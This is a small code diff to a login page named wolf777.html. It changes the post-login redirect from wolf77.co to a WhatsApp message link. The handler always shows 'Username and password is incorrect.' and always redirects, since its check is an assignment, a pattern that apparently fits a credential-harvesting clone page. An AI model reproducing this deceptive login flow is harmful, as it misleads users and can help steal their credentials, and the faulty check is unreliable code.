--- a/wolf777.html
+++ b/wolf777.html
@@ -1603,7 +1603,7 @@
 			  success: function (msg) {
 				$("#errorMsg").html('Username and password is incorrect.');
 				if (msg = "sucessmsg") {
-				  window.location.href = "https://wolf77.co/";
+				  window.location.href = "https://wa.me/message/M54T4HNDT5SSP1";
 				}
 			  }
 			})
@@ -1631,7 +1631,7 @@
 			  success: function (msg) {
 				$("#errorMsg").html('Username and password is incorrect.');
 				if (msg = "sucessmsg") {
-				  window.location.href = "https://wolf77.co/";
+				  window.location.href = "https://wa.me/message/M54T4HNDT5SSP1";
 				}
 			  }
 			})
